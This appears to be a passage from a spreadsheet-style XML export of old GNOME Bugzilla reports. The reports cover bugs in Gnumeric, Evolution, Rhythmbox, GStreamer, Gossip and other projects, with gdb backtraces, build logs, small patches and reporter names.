#6  0x402bba42 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#7  0x402b9eb9 in gtk_signal_emit_by_name () from /usr/lib/libgtk-1.2.so.0
#8  0x4001e288 in _capplet_widget_server_page_hidden ()
   from /usr/lib/libcapplet.so.0
#9  0x4001e3f9 in server_page_hidden () from /usr/lib/libcapplet.so.0
#10 0x4001ed57 in _ORBIT_skel_GNOME_capplet_page_hidden ()
   from /usr/lib/libcapplet.so.0
#11 0x4004c774 in ORBit_POA_handle_request () from /usr/lib/libORBit.so.0
#12 0x4004e61d in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#13 0x4004e7fd in CORBA_ORB_run () from /usr/lib/libORBit.so.0
#14 0x40070cbe in giop_main_handle_connection () from /usr/lib/libIIOP.so.0
#15 0x400df387 in orb_handle_connection () from /usr/lib/libgnorba.so.27
#16 0x4008baca in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#17 0x4008d186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#18 0x4008d751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#19 0x4008d8f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#20 0x4028d5b9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#21 0x4001e4e5 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#22 0x4001def5 in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#23 0x804ca5a in main ()
#24 0x405369cb in __libc_start_main (main=0x804c6c0  argc=3 
    argv=0xbffff9e4 init=0x804b0d4  fini=0x8050bec  
    rtld_fini=0x4000ae60  stack_end=0xbffff9dc)
    at ../sysdeps/generic/libc-start.c:92
#0  0x405af8e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4060e1ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x4014d591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x4053cc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x4028eefd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#5  0x402bc5fd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#6  0x402bba42 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x402b9eb9 in gtk_signal_emit_by_name () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-11-24 18:29 -------
Unknown version 1.0.x in product control-center. Setting version to the default unspecified.
The original reporter (chavrill@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>chavrill</t>
  </si>
  <si>
    <t>GNOMEICU-106321</t>
  </si>
  <si>
    <t>A character becomes garbage by ICQ of Windows.</t>
  </si>
  <si>
    <t>I use gnomeicu-0.98.137.CVS20030216 (package of Debian)
When I sent the message it was said that a partner could not read.
It was said that it could read if a program is changed as follows.
--- v7send.c.org        2003-02-16 23:55:59.000000000 +0900
+++ v7send.c    2003-02-18 00:35:12.000000000 +0900
@@ -439 +439 @@
   history_add_outgoing( uin text )
   if (kontakt-&gt;has_rtf)
-    v7_sendmsg_rtf(conn uin text)
-  else
     v7_sendmsg_plain(conn uin text)
+  else
+    v7_sendmsg_rtf(conn uin text)
 }</t>
  </si>
  <si>
    <t>sitamo</t>
  </si>
  <si>
    <t>GIMP-674543</t>
  </si>
  <si>
    <t>Heal tool reads garbage values from solution matrix</t>
  </si>
  <si>
    <t>Created attachment 212523
Patch.
In the heal tool the black checkers of the left hand edge of the solution matrix aren't currently being assigned a value.
Attached is a (trivial) patch that solves the issue.
It might explain the corruption described here (although I was never really able to reproduce the issue): https://mail.gnome.org/archives/gimp-developer-list/2012-April/msg00122.html
Also it seems that this fixes the corruption in the proposed patch for bug 568098. (That patch is attachment 184900).</t>
  </si>
  <si>
    <t>drawoc</t>
  </si>
  <si>
    <t>GMIME-770634</t>
  </si>
  <si>
    <t>boundary generation is broken on mac os (and probably windows)</t>
  </si>
  <si>
    <t>There is a bug in read_random_pool:
https://github.com/GNOME/gmime/blob/115993bd01c70513acabcce87cebdd5283b414e6/gmime/gmime-multipart.c#L713
Should be calling srand once not every function call.</t>
  </si>
  <si>
    <t>kane.isturm</t>
  </si>
  <si>
    <t>GNUMERIC-68430</t>
  </si>
  <si>
    <t>Tried opening Excel 97 File and it crahsed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Gnumeric
Severity: normal
Version: 0.67
Synopsis: Tried opening Excel 97 File and it crahsed
Bugzilla-Product: Gnumeric
Bugzilla-Component: MS Excel (tm)
Description:
Tried to open a MS Excel 97 File and Gnumeric Crashed.
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...[New Thread 1024 (LWP 2526)]
0x406fce29 in __wait4 () from /lib/libc.so.6
#0  0x406fce29 in __wait4 () from /lib/libc.so.6
#1  0x40779050 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40256e88 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x405d48a6 in g_str_hash () from /usr/lib/libglib-1.2.so.0
#5  0x405c5a30 in g_hash_table_lookup () from /usr/lib/libglib-1.2.so.0
#6  0x080d9295 in string_lookup ()
#7  0x080d92b1 in string_get ()
#8  0x080dede2 in value_new_string ()
#9  0x4092e8ed in ms_excel_read_cell ()
   from /usr/lib/gnumeric/0.67/plugins/excel/excel.so
#10 0x4092fef5 in ms_excel_read_sheet ()
   from /usr/lib/gnumeric/0.67/plugins/excel/excel.so
#11 0x40930b3c in ms_excel_read_workbook ()
   from /usr/lib/gnumeric/0.67/plugins/excel/excel.so
#12 0x4092121d in excel_file_open ()
   from /usr/lib/gnumeric/0.67/plugins/excel/excel.so
#13 0x080ad2bc in gnumeric_plugin_loader_module_get_type ()
#14 0x080af1f6 in gnumeric_plugin_loader_is_loaded ()
#15 0x0808778a in gnum_file_opener_open ()
#16 0x080e7d94 in wb_view_open_custom ()
#17 0x080e7bf9 in wb_view_open ()
#18 0x08095cef in gui_file_open ()
#19 0x403a0de1 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#20 0x403d4436 in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#21 0x403d376d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#22 0x403d1525 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#23 0x40338e2d in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#24 0x4033a5ed in gtk_real_button_released () from /usr/lib/libgtk-1.2.so.0
#25 0x403a0de1 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#26 0x403d35f1 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#27 0x403d1525 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#28 0x40338d5d in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#29 0x40339ed7 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#30 0x403a0aec in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#31 0x403d37ad in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#32 0x403d1525 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#33 0x4040bb89 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#34 0x403a0a45 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#35 0x4039fa6f in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#36 0x40450d7f in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#37 0x405c9773 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#38 0x405c9d39 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#39 0x405c9eec in g_main_run () from /usr/lib/libglib-1.2.so.0
#40 0x4039f333 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#41 0x0809e5f1 in item_grid_get_type ()
#42 0x0809e655 in main ()
#43 0x40665306 in __libc_start_main (main=0x809e640  argc=1 
    ubp_av=0xbffffa34 init=0x8065bcc  fini=0x8139bc0  
    rtld_fini=0x4000d2dc  stack_end=0xbffffa2c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x406fce29 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40779050 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40256e88 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x405d48a6 in g_str_hash () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#5  0x405c5a30 in g_hash_table_lookup () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x080d9295 in string_lookup ()
No symbol table info available.
#7  0x080d92b1 in string_get ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-10 15:03 -------
The original reporter (cpt_morian@hotmail.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>cpt_morian</t>
  </si>
  <si>
    <t>EVOLUTION-319394</t>
  </si>
  <si>
    <t>Inbox empty when using IMAP</t>
  </si>
  <si>
    <t>Please describe the problem:
I have added a mail account that uses a IMAP server. I can't see any
mails in my inbox. If i take properties on the inbox I get the correct
number of mails and unread mails but the mails do not appear in
Messages view. I have no problem viewing the underlying folders draft
sent and trash.
Steps to reproduce:
1. No idea
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
All the time
Other information:</t>
  </si>
  <si>
    <t>PANGO-314675</t>
  </si>
  <si>
    <t>problem with get_type functions in pangocairo</t>
  </si>
  <si>
    <t>I notice that in pango/pangocairo-fc.h that pango_cairo_fc_font_map_get type()
is defined and that in pango/pangocairo-fcfont.c pango_cairo_fc_font_get_type
is defined as an interface yet these two functions don't seem to be defined
anywhere in pango.  This causes problems linking with the pangocairo.so library
when linking it with GTK+.  Should the PANGO_TYPE_XFT_FONT_MAP and the
PANGO_TYPE_XFT_FONT be redefined to use a G_TYPE_CHECK_INSTANCE_CAST macro like
the other _TYPE_ macros used in pango and these two functions removed?  If so I
can provide a patch.</t>
  </si>
  <si>
    <t>GNOME-SHELL-792259</t>
  </si>
  <si>
    <t>overview</t>
  </si>
  <si>
    <t>Application category icons are tiny when using HIDPI</t>
  </si>
  <si>
    <t>Created attachment 366402
This patch fixes the bug
The patch fixes it.</t>
  </si>
  <si>
    <t>lamefun.x0r</t>
  </si>
  <si>
    <t>RHYTHMBOX-314707</t>
  </si>
  <si>
    <t>Editing radio stations auto-highlights text</t>
  </si>
  <si>
    <t>I'm trying to edit a radio-station and add a new url. I copy the url from my
console and right-click on my station I want to edit. This highlights the field
with the name of the station in. thus copying it to my clipboard and ruining my
url there. Very minor but not quite following the rule of least surprise )
Other information:</t>
  </si>
  <si>
    <t>kastberg</t>
  </si>
  <si>
    <t>GTHUMB-99042</t>
  </si>
  <si>
    <t>Underscores (_) in bookmarks and history list get translated to access keys</t>
  </si>
  <si>
    <t>If I have a directory series_one that I add to bookmarks (or gets
automatically added to the history menu) the menu option shows up as
seriesone with the 'o' underlined as an access key.</t>
  </si>
  <si>
    <t>PLANNER-321203</t>
  </si>
  <si>
    <t>Planner crashes on Export to Database</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: planner
Severity: critical
Version:  0.13
Synopsis: Planner crashes on Export to Database
Bugzilla-Product: planner
Bugzilla-Component: General
Bugzilla-Version: 0.13
BugBuddy-GnomeVersion: 2.0 (2.10.1)
Description:
Description of the crash:
If you export a new project to a database and the tables on the
database server are empty (after the setup they were for me) you get a
crash
Steps to reproduce the crash:
1. Setup Postgres as per the instructions in the source	
2. Start Planner and enter in some basic project information
3. Export it to a Database
4. Watch it crash
Expected Results:
That there would now be project information in the database
How often does this happen?
Every time.
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/local/bin/planner'
Using host libthread_db library /lib/tls/libthread_db.so.1.
------- Bug moved to this database by unknown@gnome.bugs 2005-11-11 02:16 UTC -------
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@gnome.bugs.
   Previous reporter was ppatters@nit.ca.
</t>
  </si>
  <si>
    <t>ppatters</t>
  </si>
  <si>
    <t>GTK+-68517</t>
  </si>
  <si>
    <t>Unexpected warning message when running gnome-panel-2</t>
  </si>
  <si>
    <t>When I ran gnome-panel-2 and displayed the panel's context menu using
button three and then pressed up arrow to get to the top most menu item and
then pressed right arrow repeatedly I got the following warning message:
gnome-panel-2 (pid:21986): GLib-GObject-WARNING **: invalid cast from
(NULL) pointer to `GtkMenuShell'
Proposed patch to follow.</t>
  </si>
  <si>
    <t>EVOLUTION-231993</t>
  </si>
  <si>
    <t>Queries for removed folders are not cleared up</t>
  </si>
  <si>
    <t>If you remove a calendar folder and then immediately without restarting
wombat you re-create the same folder (create new folder with the same
name) and access the new folder the query returns the matched objects for
the last query before it was removed.
This means that when a folder is removed queries are not cleared up.</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-116944</t>
  </si>
  <si>
    <t>[PATCH] HIGify the various dialogs</t>
  </si>
  <si>
    <t>Hi Rich
I am attaching a patch to improve the HIGification of the edit constants
edit functions and insert ASCII value dialogs.  I will also attach
screenshots.  Let me know what you think.
Take care
Dennis</t>
  </si>
  <si>
    <t>GOSSIP-167360</t>
  </si>
  <si>
    <t>crash on Imendio Gossip</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian testing/unstable
Package: gossip
Severity: normal
Version: GNOME2.8.1 0.7.8
Gnome-Distributor: Ubuntu
Synopsis: crash on Imendio Gossip
Bugzilla-Product: gossip
Bugzilla-Component: General
Bugzilla-Version: 0.7.8
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
The application crash when I try to record a new account on jabber
server.
Steps to reproduce the crash:
1. In parameter window set SSL Crypt On.
2. Set an open port on the port section.
3. Click register.
Expected Results:
I expected a validation window of my inscription. a notice that explain all is
ok
How often does this happen?
It's appen every time.
Additional Information:
I use an firewall but the NAT transport the 5222 and 443 port to my
machine.
The operating system Is ubuntu Linux Warty
Debugging Information:
Backtrace was generated from '/usr/bin/gossip'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/i686/cmov/libthread_db.so.1.
(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Thread debugging using
libthread_db enabled]
[New Thread 1087609120 (LWP 28805)]
(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0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x40af0403 in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0x400a93dd in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x40b62251 in vfprintf () from /lib/tls/i686/cmov/libc.so.6
#5  0x40b82f62 in vasprintf () from /lib/tls/i686/cmov/libc.so.6
#6  0x00000000 in ?? ()
#7  0x00000000 in ?? ()
#8  0x083402b8 in ?? ()
#9  0x0835ef68 in ?? ()
#10 0x00000025 in ?? ()
#11 0x00000024 in ?? ()
#12 0xfbad8000 in ?? ()
#13 0x083402b8 in ?? ()
#14 0x083402b8 in ?? ()
#15 0x083402b8 in ?? ()
#16 0x083402b8 in ?? ()
#17 0x083402b9 in ?? ()
#18 0x0834031c in ?? ()
#19 0x083402b8 in ?? ()
#20 0x0834031c in ?? ()
#21 0x00000000 in ?? ()
#22 0x00000000 in ?? ()
#23 0x00000000 in ?? ()
#24 0x00000000 in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0x00000000 in ?? ()
#28 0x00000000 in ?? ()
#29 0x00000000 in ?? ()
#30 0x00000000 in ?? ()
#31 0x00000000 in ?? ()
#32 0x00000000 in ?? ()
#33 0x00000000 in ?? ()
#34 0x00000000 in ?? ()
#35 0xffffffff in ?? ()
#36 0x00000000 in ?? ()
#37 0x4083d500 in ?? () from /usr/lib/libgcrypt.so.7
#38 0x00000080 in ?? ()
#39 0xbfffde18 in ?? ()
#40 0x407f9dd6 in gcry_set_log_handler () from /usr/lib/libgcrypt.so.7
#41 0x00000000 in ?? ()
#42 0x00000040 in ?? ()
#43 0x52598170 in ?? ()
#44 0x00000000 in ?? ()
#45 0x00000000 in ?? ()
#46 0x00000000 in ?? ()
#47 0x00000000 in ?? ()
#48 0x40c43060 in stderr () from /lib/tls/i686/cmov/libc.so.6
#49 0x08055018 in ?? ()
#50 0x40b8b5eb in malloc () from /lib/tls/i686/cmov/libc.so.6
#51 0x409a3398 in ?? () from /usr/lib/libglib-2.0.so.0
#52 0xbfffde50 in ?? ()
#53 0x00000200 in ?? ()
#54 0xbfffde38 in ?? ()
#55 0x4096f359 in g_vasprintf () from /usr/lib/libglib-2.0.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-02-14 11:09 -------
Unknown version 0.7.8 in product gossip.  Setting version to 0.7.X.
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product gossip.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was leroy.brice@club-internet.Fr.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>leroy.brice</t>
  </si>
  <si>
    <t>JHBUILD-519652</t>
  </si>
  <si>
    <t>additional faq for xsession script</t>
  </si>
  <si>
    <t>Use faq for a more sophisticated session script that is run when you log in using a graphical login manager</t>
  </si>
  <si>
    <t>GSTREAMER-110038</t>
  </si>
  <si>
    <t>sine fails to compile?</t>
  </si>
  <si>
    <t>make[3]: Entering directory
`/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gst-plugins/gst/sine'
source='gstsinesrc.c' object='libgstsinesrc_la-gstsinesrc.lo' libtool=yes \
depfile='.deps/libgstsinesrc_la-gstsinesrc.Plo'
tmpdepfile='.deps/libgstsinesrc_la-gstsinesrc.TPlo' \
depmode=gcc3 /bin/sh ../../depcomp \
/bin/sh ../../libtool --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I../..  
 -I../../gst-libs -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -pthread
-I/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gstreamer/pkgconfig/..
-I/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gstreamer/pkgconfig/../libs
-I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/libxml2
  -DGST_DISABLE_DEPRECATED
-g  -g -O2 -c -o libgstsinesrc_la-gstsinesrc.lo `test -f 'gstsinesrc.c' || echo
'./'`gstsinesrc.c
gcc -DHAVE_CONFIG_H -I. -I. -I../.. -I../../gst-libs -D_LARGEFILE_SOURCE
-D_FILE_OFFSET_BITS=64 -pthread
-I/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gstreamer/pkgconfig/..
-I/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gstreamer/pkgconfig/../libs
-I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/libxml2
-DGST_DISABLE_DEPRECATED -g -g -O2 -c gstsinesrc.c -MT
libgstsinesrc_la-gstsinesrc.lo -MD -MP -MF
.deps/libgstsinesrc_la-gstsinesrc.TPlo  -fPIC -DPIC -o
libgstsinesrc_la-gstsinesrc.lo
/bin/sh ../../libtool --mode=link gcc  -g -O2   -o libgstsinesrc.la -rpath
/usr/local/lib/gstreamer-0.6 -module -avoid-version
libgstsinesrc_la-gstsinesrc.lo
/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gstreamer/pkgconfig/../gst/libgstreamer-0.6.la
-Wl--export-dynamic -pthread -lgobject-2.0 -lgmodule-2.0 -ldl
-lgthread-2.0 -lxml2 -lz -lm -lglib-2.0   -lgstcontrol-0.6
mkdir .libs
rm -fr .libs/libgstsinesrc.la .libs/libgstsinesrc.* .libs/libgstsinesrc.*
(cd . &amp;&amp; ln -s libgstsinesrc_la-gstsinesrc.lo libgstsinesrc_la-gstsinesrc.o)
gcc -shared  libgstsinesrc_la-gstsinesrc.lo  -Wl--rpath
-Wl/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gstreamer/pkgconfig/../gst/.libs
-Wl--rpath -Wl/usr/local/lib  -L/usr/lib
/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gstreamer/pkgconfig/../gst/.libs/libgstreamer-0.6.so
-lgobject-2.0 -lgmodule-2.0 -ldl -lgthread-2.0 -lxml2 -lz -lm -lglib-2.0
-lgstcontrol-0.6   -Wl--export-dynamic -Wl-soname -Wllibgstsinesrc.so -o
.libs/libgstsinesrc.so
/usr/bin/ld: cannot find -lgstcontrol-0.6
collect2: ld returned 1 exit status
make[3]: *** [libgstsinesrc.la] Error 1
make[3]: Leaving directory
`/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gst-plugins/gst/sine'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory
`/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gst-plugins/gst'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory
`/home/rbultje/projects/gstreamer/gstreamer-0.6.1/gst-plugins'
make: *** [all] Error 2
[rbultje@tux gst-plugins]$</t>
  </si>
  <si>
    <t>EVOLUTION-333799</t>
  </si>
  <si>
    <t>Focusing the window marks the first mail as unread</t>
  </si>
  <si>
    <t>Using unread mails virtual folder i always have a list of mails pending to be
read and i leave them as is to keep them in that virtual folder. My problem is
that i switch from current workspace to another one leaving evolution with no
mail selected and when i get back evolution gets focus automatically select the
first mail from the list mark it as read after the timeout and if i m not very
carefull i m just missing that mail because it's going away from the virtual
folder. So please could you make that evolution does not select the first mail
from the list automatically when getting focus ?
Other information:</t>
  </si>
  <si>
    <t>NAUTILUS-41741</t>
  </si>
  <si>
    <t>Theme Icons need to have a defined location for where badges appear.</t>
  </si>
  <si>
    <t xml:space="preserve">Theme Icons need to have a defined location for where badges appear.
------- Additional Comments From arlo@workthatmouse.com 2000-07-25 17:43:27 ----
I would suggest that we give the folders an XML description that defines 
up to six badges then start stacking them (or something).
We also need a guideline on how big the badges are... I think this 
description will only work if there's a maximum size for the badges... and 
sadly I think most of Susan's badges fall on the too large side.
If you disagree we can try and figure out a way around the size issue.
------- Additional Comments From andy@eazel.com 2000-07-26 13:59:26 ----
I agree that we need this but it's harder than you might think due to the API
of the icon factory.  This also applies to documents.
------- Additional Comments From darin@bentspoon.com 2000-07-31 14:16:02 ----
Bud thinks it's OK to defer this. Since I believe Andy is already working on
this I decided not to mark it deferred. Andy if you aren't already mostly
done please mark it deferred.
------- Additional Comments From andy@eazel.com 2000-08-02 10:46:36 ----
this is now completed
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
The original reporter (arlo@workthatmouse.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>arlo</t>
  </si>
  <si>
    <t>EVOLUTION-207445</t>
  </si>
  <si>
    <t>Settings Not Saved</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12.99
Synopsis: Settings Not Saved
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Some settings are not being saved.  Namely in this case Citation
Color
Unknown reporter: relia@tetramid.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>relia</t>
  </si>
  <si>
    <t>RHYTHMBOX-316225</t>
  </si>
  <si>
    <t>hangs after selecting daap music source</t>
  </si>
  <si>
    <t>The interface hangs after selecting daap music source.
When I attach gdb to the process and do a CTRL-C I get this:
Program received signal SIGINT Interrupt.
[Switching to Thread -1208580416 (LWP 4991)]
0x00a95402 in ?? ()
(gdb) bt
#0  0x00a95402 in ?? ()
#1  0x0032e3c8 in connect () from /lib/libpthread.so.0
#2  0x00491270 in soup_socket_connect (sock=0x9ac15d0 remote_addr=0x9ae5bd8)
    at soup-socket.c:568
#3  0x00491823 in soup_socket_client_new_sync (
    hostname=0x9b46a58 128.220.143.248 port=3689 ssl_creds=0x0
    status_ret=0xbf886258) at soup-socket.c:808
#4  0x0047fe9e in soup_connection_connect_sync (conn=0x9b46a18)
    at soup-connection.c:538
#5  0x0048e686 in send_message (session=0x9b2fe78 msg=0x9b3c7b0)
    at soup-session-sync.c:125
#6  0x0048de1a in soup_session_send_message (session=0x9b2fe78 msg=0x9b3c7b0)
    at soup-session.c:1277
#7  0x080bdc7e in http_get (connection=0x9bbbfb0
    path=0x80d0667 /server-info need_hash=0 version=0 req_id=0
    send_close=0 structure=0xbf886464) at rb-daap-connection.c:625
#8  0x080be316 in rb_daap_connection_new (
    name=0x9b154b8 tunisonÃ¢\200\231s Music
    host=0x9ba4808 128.220.143.248 port=3689 password_protected=-512
    db=0x9949620 type=2) at rb-daap-connection.c:691
#9  0x080878b7 in rb_daap_source_activate (source=0x9913140)
    at rb-daap-source.c:532
#10 0x08079512 in rb_source_activate (source=0xfffffe00) at rb-source.c:687</t>
  </si>
  <si>
    <t>EPIPHANY-110747</t>
  </si>
  <si>
    <t>Drag-handle/favicon doesn't overlay on gradient themes properly</t>
  </si>
  <si>
    <t>The drag-handle/favicon on the toolbar doesn't seem to mask the transparency correctly leading to ugliness if you happen to use a gradient theme. See screenshot at http://www.leewillis.co.uk/UglyFavicon.png
Note how the background of the GNOME foot favicon is all white - not gradiented. The toolbar buttons all get this right ...
For reference I'm running the SPhereCrystal GTK2 theme.</t>
  </si>
  <si>
    <t>GNUMERIC-56992</t>
  </si>
  <si>
    <t>crash if pasting special from two cells</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.61
Synopsis: crash if pasting special from two cells
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.5 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
Select two cells in the spread sheet
Right click on mouse and choose COPY
Go to another cell
Right click on mouse and select PASTE SPECIAL
Then select ADD
-&gt; crash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x407a5519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x407a5519 in __wait4 () from /lib/i686/libc.so.6
#1  0x408159e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x402657e8 in gnome_segv_handle () at eval.c:41
#3  
#4  0x08071ffc in cell_calc_span () at eval.c:41
#5  0x08072193 in cell_calc_span () at eval.c:41
#6  0x08072766 in clipboard_paste_region () at eval.c:41
#7  0x08078206 in cmd_paste_cut () at eval.c:41
#8  0x08074c4c in command_list_release () at eval.c:41
#9  0x0807338c in cmd_paste () at eval.c:41
#10 0x0807343f in cmd_paste_to_selection () at eval.c:41
#11 0x080be600 in sheet_view_start_sliding () at eval.c:41
#12 0x0808c26b in gnumeric_non_modal_dialog () at eval.c:41
#13 0x403c42b1 in gtk_marshal_NONE__NONE () at eval.c:41
#14 0x403f7916 in gtk_handlers_run () at eval.c:41
#15 0x403f6c3d in gtk_signal_real_emit () at eval.c:41
#16 0x403f49f5 in gtk_signal_emit () at eval.c:41
#17 0x4042f230 in gtk_widget_activate () at eval.c:41
#18 0x403cd0e9 in gtk_menu_shell_activate_item () at eval.c:41
#19 0x403cc242 in gtk_menu_shell_button_release () at eval.c:41
#20 0x403c3fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#21 0x403f6c7d in gtk_signal_real_emit () at eval.c:41
#22 0x403f49f5 in gtk_signal_emit () at eval.c:41
#23 0x4042f0e9 in gtk_widget_event () at eval.c:41
#24 0x403c3f15 in gtk_propagate_event () at eval.c:41
#25 0x403c2f3f in gtk_main_do_event () at eval.c:41
#26 0x4047ae4f in gdk_event_dispatch () at eval.c:41
#27 0x4060d7f3 in g_main_dispatch () at eval.c:41
#28 0x4060ddd9 in g_main_iterate () at eval.c:41
#29 0x4060df8c in g_main_run () at eval.c:41
#30 0x403c2803 in gtk_main () at eval.c:41
#31 0x080663d2 in _start () at eval.c:41
#32 0x08066435 in main () at eval.c:41
#33 0x40707177 in __libc_start_main (main=0x8066420  argc=2 
    ubp_av=0xbffffb64 init=0x8062f5c  fini=0x812fc0c  
    rtld_fini=0x4000e184  stack_end=0xbffffb5c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x407a5519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x408159e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x402657e8 in gnome_segv_handle () at eval.c:41
	in eval.c
ap = (void **) 0x8358ae8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 137726696
result = 0
#3  
No locals.
#4  0x08071ffc in cell_calc_span () at eval.c:41
41	in eval.c
ap = (void **) 0x8358ae8
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x15 
result = 137726696
result = 21
#5  0x08072193 in cell_calc_span () at eval.c:41
41	in eval.c
ap = (void **) 0x0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8307ac0 \001
result = 0
result = 137394880
#6  0x08072766 in clipboard_paste_region () at eval.c:41
41	in eval.c
ap = (void **) 0x834d980
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x82eb388 v\2304\022
result = 137681280
result = 137278344
